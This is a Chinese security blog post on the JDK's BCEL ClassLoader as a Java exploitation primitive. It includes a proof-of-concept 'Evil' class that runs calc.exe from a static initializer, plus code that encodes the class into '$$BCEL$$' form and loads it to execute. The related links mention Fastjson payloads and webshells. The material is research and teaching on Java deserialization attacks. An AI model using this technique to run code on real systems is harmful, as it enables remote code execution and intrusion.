BCEL classloader

最新推荐文章于 2024-06-10 09:38:25 发布
最新推荐文章于 2024-06-10 09:38:25 发布
阅读量653 收藏
点赞数
分类专栏: # java漏洞 文章标签: java apache windows 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/128901126
版权

一、概述

BCEL的全名应该是Apache Commons BCEL,属于Apache Commons项目下的一个子项目。Apache Commons大家应该不陌生,反序列化最著名的利用链就是出自于其另一个子项目——Apache Commons Collections。

就这个库的功能来看,其使用面远不及同胞兄弟们,但是他比Commons Collections特殊的一点是,它被包含在了原生的JDK中,位于com.sun.org.apache.bcel。

二、BCEL ClassLoader如何使用

BCEL这个包中有个有趣的类com.sun.org.apache.bcel.internal.util.ClassLoader,他是一个ClassLoader,但是他重写了Java内置的ClassLoader#loadClass()方法。

  • 在ClassLoader#loadClass()中,接受一个String并且判断类名是否是$$BCEL$$开头,如果是的话,调用createClass方法。

  • 此方法中将会对这个字符串截取$$BCEL$$后面的字符串进行decode,解码后经过一些列处理后返回clazz,也就是javaclass。

  • 当我们的字节码加载完成javaclass后,如果不为空,即调用definClass方法动态加载。

既然存在decode,那我们看一下encode是如何编码的。

  • JavaWrite#write方法如下:

基本可以理解为是传统字节码的HEX编码,再将反斜线替换成$。默认情况下外层还会加一层GZip压缩。

测试:

public class Evil {
    static {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (Exception e) {}
    }
}

然后将Evil生成BCEL形式的字节码。使用这个字节码来新建对象,将会调用到计算器。

实战中我们可以通过BCEL提供的两个类Repository 和Utility 来利用: Repository 用于将一个Java  Class先转换成原生字节码,当然这里也可以直接使用javac命令来编译java文件生成字节码;  Utility 用于将原生的字节码转换成BCEL格式的字节码:

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import java.nio.file.Files;
import java.nio.file.Paths;

public class EvilBCEL {
    public static void main(String[] args) throws Exception {
        //方式一:
//        JavaClass cls = Repository.lookupClass(Evil.class);
//        String code = Utility.encode(cls.getBytes(), true);
//        System.out.println(code);
//        new ClassLoader().loadClass("$$BCEL$$" + code).newInstance();

        //方式二:
        byte[] codebyte =Files.readAllBytes(Paths.get("C:\\tools\\fuxian\\TestDemo\\src\\main\\java\\com\\huawei\\ClassLoader\\Evil.class"));
        String code2 = Utility.encode(codebyte, true);
        System.out.println(code2);
        new ClassLoader().loadClass("$$BCEL$$" + code2).newInstance();
    }
}

注意:

在Java 8u251的更新中,这个ClassLoader被移除了

Thunderclap_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Java安全之BCEL ClassLoader
「 虚幻私塾」
02-08 1098
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 目录 Java安全之BCEL ClassLoader 写在前面 About BCEL 调试分析 食用姿势 Fuzz反序列化Gadget Fastjson BCEL Payload Thymeleaf SSTI Payload Java安全之BCEL ClassL
BCEL ClassLoader
混子
12-12 8981
在复现漏洞时,反弹shell始终不成功,后来在一位大佬帖子下看到了这个方法进行写webshell,最终使用蚁剑连接,上线,出于好奇,就自己学习了下,这篇文章主要讲解BCEL
探秘Apache Commons BCEL:强大的字节码工程库
gitblog_00092的博客
06-10 402
探秘Apache Commons BCEL:强大的字节码工程库 项目地址:https://gitcode.com/apachecommons-bcel/commons-bcel Apache Commons BCEL(Bytecode Engineering Library)是一个强大的Java字节码操控和分析框架,它提供了创建、修改和分析类文件的能力,是进行动态程序生成、代码分析和优化的得力工具...
使用bcel动态创建class
weixin_33858249的博客
04-14 133
ApacheBCEL库,文档很少,例子也很简单。动态构建类的工作,要求的只是并不是熟练使用BCEL类库本身,而是要对java的class结构了解。我对java的pcode也不熟悉,但是我曾经做过大量的.NET的反编译工作,两者类似,所以我用BCEL也不觉得困难。我提供一个例子,这里例子是使用BCEL创建类的实例,而不是使用反射。如下:IFactory.java public interfa...
bcel java_BCEL
weixin_30737081的博客
02-13 800
软件简介Byte Code Engineering Library (BCEL),这是Apache Software Foundation 的Jakarta项目的一部分。BCELJava classworking 最广泛使用的一种框架,它可以让您深入 JVM汇编语言进行类操作的细节。BCELJavassist 有不同的处理字节码方法,BCEL在实际的JVM 指令层次上进行操作(BCEL拥有丰...
BCEL简明教程
evasnowind的专栏
12-04 5092
注意:本文章主要依据BCEL官方手册进行阐述,大部分内容都是从该手册直接翻译过来的,并做了一定的简化,同时还参考了《深入理解Java虚拟机》(周志明著)。笔者在下面阐述的时候也会给出相应的章节,如果读者有不清楚的地方请参考BCEL官方手册或是BCEL API,以及《深入理解Java虚拟机》。 BCEL是什么? 相信搜索到这篇文章的读者应该知道BCEL是啥,不过还是简要提一下吧:BCEL(...
apache bcel
12-05
apache bcel
BCEL类代码解析工具
最新发布
06-26
BCEL代码解析工具 ,执行java -jar BCELCode.jar -d file.txt 即可解密。
bcel-6.0 bcel-6.0
08-08
标题和描述中提到的“bcel-6.0”是指Byte Code Engineering Library(BCML)的6.0版本。BCML是一个Java字节码操纵和分析框架,它允许开发者对Java类文件进行操作和分析,包括创建、修改和动态生成。这个工具主要用于...
bcel_两个版本.zip
10-29
在IT行业中,Ant和BCEL是两个非常重要的工具,它们在软件开发和部署过程中起着关键的作用。让我们深入了解这两个概念以及它们如何协同工作。 首先,`Ant`是Apache软件基金会的一个项目,它是一个基于Java的构建工具...
bcel.jar包
11-06
bcel.jar的jar包,开发findbugs自定义插件可以用。
bcel-5.2
06-09
bcel-5.2,字节码编辑器。
JAVA字节码操作库 BCEL
06-06
JAVA字节码操作库 BCEL
基于bcel的class动态编译
qq_16590151的专栏
12-05 563
apache bcel动态编译
BCEL ClassLoader去哪了?
离别歌
10-26 1503
com.sun.org.apache.bcel.internal.util.ClassLoader是常常在构造漏洞利用POC时用到的类。但是,我前几天在写《Java安全漫谈》的时候,偶然...
精准测试——BCEL字节码检测
weixin_44063491的博客
03-28 424
本文介绍BCEL字节码检测的方法,可以检测java的方法调用链路,可以用于精准测试专项中。
bcel_BCEL的字节码工程
cusi77914的博客
06-29 2774
在本系列的最后三篇文章中,我向您展示了如何使用Javassist框架进行类工作。 这次,我将使用Apache字节码工程库(BCEL)来介绍一种非常不同的字节码操作方法。 BCEL在实际的JVM指令级别上运行,这与Javassist支持的源代码接口不同。 当您确实想控制程序执行的每个步骤时,低级方法使BCEL非常有用,但是对于两种情况都可以使用的情况,使用BCEL的工作也比使用Javassist...
java classloader
wangjuntytl的专栏
03-04 853
java classloader
Apache Commons BCELJava字节码操作
宋小黑的博客
01-04 1571
咱们今天来聊聊Apache Commons BCEL(Byte Code Engineering Library)。你可能会问,BCEL是什么鬼?别急,小黑这就给你娓娓道来。BCEL,它是一款专门用来操作Java字节码的库。想象一下,Java代码编译后变成了字节码,这些字节码是Java虚拟机执行的真正“源代码”。有了BCEL,咱们就能像变魔术一样,对这些字节码进行读取、修改,甚至创造出全新的字节码!那为啥要搞字节码呢?这事儿得从Java的运行原理说起。
linux bcel
06-26
Linux BCEL(Byte Code Engineering Library)是一个Java库,主要用于Java字节码的处理。BCELApache Jakarta项目的一部分,它提供了一组API,开发者可以使用这些API来读取、分析、修改和执行Java字节码。BCEL的主要功能包括: 1. **字节码解析**:它可以解析.class文件中的字节码,将其转换为可操作的数据结构,方便后续处理。 2. **字节码生成**:支持将Java源代码或高级表示形式转换为字节码。 3. **字节码遍历**:可以对字节码进行逐条操作,例如查找特定方法、字段或指令。 4. **修改字节码**:允许程序员在运行时动态地修改或增强Java程序的行为。 5. **分析工具**:用于反编译、性能分析或插桩(intercepting bytecode execution)等目的。 BCEL通常被用在需要深入分析、处理或自定义Java字节码的应用中,比如动态代理、插件系统,或者需要进行低级别Java编程的场景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值